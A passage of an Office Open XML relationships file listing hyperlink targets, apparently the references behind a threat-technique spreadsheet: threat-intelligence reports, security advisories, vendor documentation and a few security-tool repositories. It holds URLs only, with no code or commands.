Target="https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" TargetMode="External"/><Relationship Id="rId870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" TargetMode="External"/><Relationship Id="rId1086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf" TargetMode="External"/><Relationship Id="rId1293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Esentutl/" TargetMode="External"/><Relationship Id="rId2137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/" TargetMode="External"/><Relationship Id="rId2344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/" TargetMode="External"/><Relationship Id="rId2551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/dd315590.aspx" TargetMode="External"/><Relationship Id="rId2789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/" TargetMode="External"/><Relationship Id="rId2996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hexed.in/2019/07/osxdok-analysis.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" TargetMode="External"/><Relationship Id="rId968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html" TargetMode="External"/><Relationship Id="rId1153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/" TargetMode="External"/><Relationship Id="rId1598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/" TargetMode="External"/><Relationship Id="rId2204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists.org/fulldisclosure/2015/Dec/34" TargetMode="External"/><Relationship Id="rId2649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/" TargetMode="External"/><Relationship Id="rId2856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html" TargetMode="External"/><Relationship Id="rId730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" TargetMode="External"/><Relationship Id="rId828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" TargetMode="External"/><Relationship Id="rId1013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu" TargetMode="External"/><Relationship Id="rId1360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" TargetMode="External"/><Relationship Id="rId1458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping" TargetMode="External"/><Relationship Id="rId1665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript" TargetMode="External"/><Relationship Id="rId1872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digital.nhs.uk/cyber-alerts/2020/cc-3603" TargetMode="External"/><Relationship Id="rId2411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf" TargetMode="External"/><Relationship Id="rId2509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.cisco.com/security/talos/opening-zxshell" TargetMode="External"/><Relationship Id="rId2716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a" TargetMode="External"/><Relationship Id="rId1220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf" TargetMode="External"/><Relationship Id="rId1318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bradleyjkemp.dev/post/launchdaemon-hijacking/" TargetMode="External"/><Relationship Id="rId1525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768" TargetMode="External"/><Relationship Id="rId2923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0" TargetMode="External"/><Relationship Id="rId1732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=3299" TargetMode="External"/><Relationship Id="rId2299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" TargetMode="External"/><Relationship Id="rId3045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2016/08/group5-syria/" TargetMode="External"/><Relationship Id="rId2061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/" TargetMode="External"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" TargetMode="External"/><Relationship Id="rId892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html" TargetMode="External"/><Relationship Id="rId2159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/cobalt-strike/" TargetMode="External"/><Relationship Id="rId2366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" TargetMode="External"/><Relationship Id="rId2573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" TargetMode="External"/><Relationship Id="rId2780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dcshadow.com/" TargetMode="External"/><Relationship Id="rId752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" TargetMode="External"/><Relationship Id="rId1175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" TargetMode="External"/><Relationship Id="rId1382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/" TargetMode="External"/><Relationship Id="rId2019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/" TargetMode="External"/><Relationship Id="rId2226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" TargetMode="External"/><Relationship Id="rId2433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" TargetMode="External"/><Relationship Id="rId2640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/" TargetMode="External"/><Relationship Id="rId2878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Rootkit" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitrustgroup.com/nanocore-not-your-average-rat/" TargetMode="External"/><Relationship Id="rId1035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/sliver/netstat" TargetMode="External"/><Relationship Id="rId1242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/project-tajmahal/90240/" TargetMode="External"/><Relationship Id="rId1687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" TargetMode="External"/><Relationship Id="rId1894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId2500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" TargetMode="External"/><Relationship Id="rId2738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-132A" TargetMode="External"/><Relationship Id="rId2945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html" TargetMode="External"/><Relationship Id="rId917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" TargetMode="External"/><Relationship Id="rId1102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html" TargetMode="External"/><Relationship Id="rId1547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" TargetMode="External"/><Relationship Id="rId1961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/" TargetMode="External"/><Relationship Id="rId2805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html" TargetMode="External"/><Relationship Id="rId1407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it" TargetMode="External"/><Relationship Id="rId1614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms677982.aspx" TargetMode="External"/><Relationship Id="rId1821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/" TargetMode="External"/><Relationship Id="rId3067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sudo.ws/" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview" TargetMode="External"/><Relationship Id="rId1919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" TargetMode="External"/><Relationship Id="rId2083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html" TargetMode="External"/><Relationship Id="rId2290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory" TargetMode="External"/><Relationship Id="rId2388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" TargetMode="External"/><Relationship Id="rId2595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" TargetMode="External"/><Relationship Id="rId1197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=35936" TargetMode="External"/><Relationship Id="rId2150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/ccat" TargetMode="External"/><Relationship Id="rId2248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/operation-daybreak/75100/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" TargetMode="External"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/damianh/aws-adfs-credential-generator" TargetMode="External"/><Relationship Id="rId1057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kgretzky/evilginx2" TargetMode="External"/><Relationship Id="rId2010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" TargetMode="External"/><Relationship Id="rId2455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" TargetMode="External"/><Relationship Id="rId2662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" TargetMode="External"/><Relationship Id="rId841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf" TargetMode="External"/><Relationship Id="rId1264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" TargetMode="External"/><Relationship Id="rId1471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" TargetMode="External"/><Relationship Id="rId1569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732" TargetMode="External"/><Relationship Id="rId2108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/en-us/HT204005" TargetMode="External"/><Relationship Id="rId2315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" TargetMode="External"/><Relationship Id="rId2522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard" TargetMode="External"/><Relationship Id="rId2967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/" TargetMode="External"/><Relationship Id="rId701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" TargetMode="External"/><Relationship Id="rId939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html" TargetMode="External"/><Relationship Id="rId1124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/" TargetMode="External"/><Relationship Id="rId1331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html" TargetMode="External"/><Relationship Id="rId1776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace" TargetMode="External"/><Relationship Id="rId1983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" TargetMode="External"/><Relationship Id="rId2827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" TargetMode="External"/><Relationship Id="rId1429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/" TargetMode="External"/><Relationship Id="rId1636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)" TargetMode="External"/><Relationship Id="rId1843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" TargetMode="External"/><Relationship Id="rId3089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm" TargetMode="External"/><Relationship Id="rId1703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" TargetMode="External"/><Relationship Id="rId1910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cyberengineeringservices.com/2011/12/15/trojan-gtalk/" TargetMode="External"/><Relationship Id="rId2172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redsiege.com/kerberoast-slides" TargetMode="External"/><Relationship Id="rId3016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/foundation" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/HT208050" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/skeleton-key-malware-analysis" TargetMode="External"/><Relationship Id="rId796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/" TargetMode="External"/><Relationship Id="rId2477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" TargetMode="External"/><Relationship Id="rId2684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf" TargetMode="External"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/" TargetMode="External"/><Relationship Id="rId863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html" TargetMode="External"/><Relationship Id="rId1079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction" TargetMode="External"/><Relationship Id="rId1286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF" TargetMode="External"/><Relationship Id="rId1493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/certified-pre-owned-d95910965cd2" TargetMode="External"/><Relationship Id="rId2032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/power-platform/admin/block-forwarded-email-from-power-automate" TargetMode="External"/><Relationship Id="rId2337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf" TargetMode="External"/><Relationship Id="rId2544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx" TargetMode="External"/><Relationship Id="rId2891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/operation-applejeus/87553/" TargetMode="External"/><Relationship Id="rId2989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fileinfo.com/extension/plist" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.berkeley.edu/node/94" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" TargetMode="External"/><Relationship Id="rId1146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html" TargetMode="External"/><Relationship Id="rId1798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/office/vba/api/overview/" TargetMode="External"/><Relationship Id="rId2751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 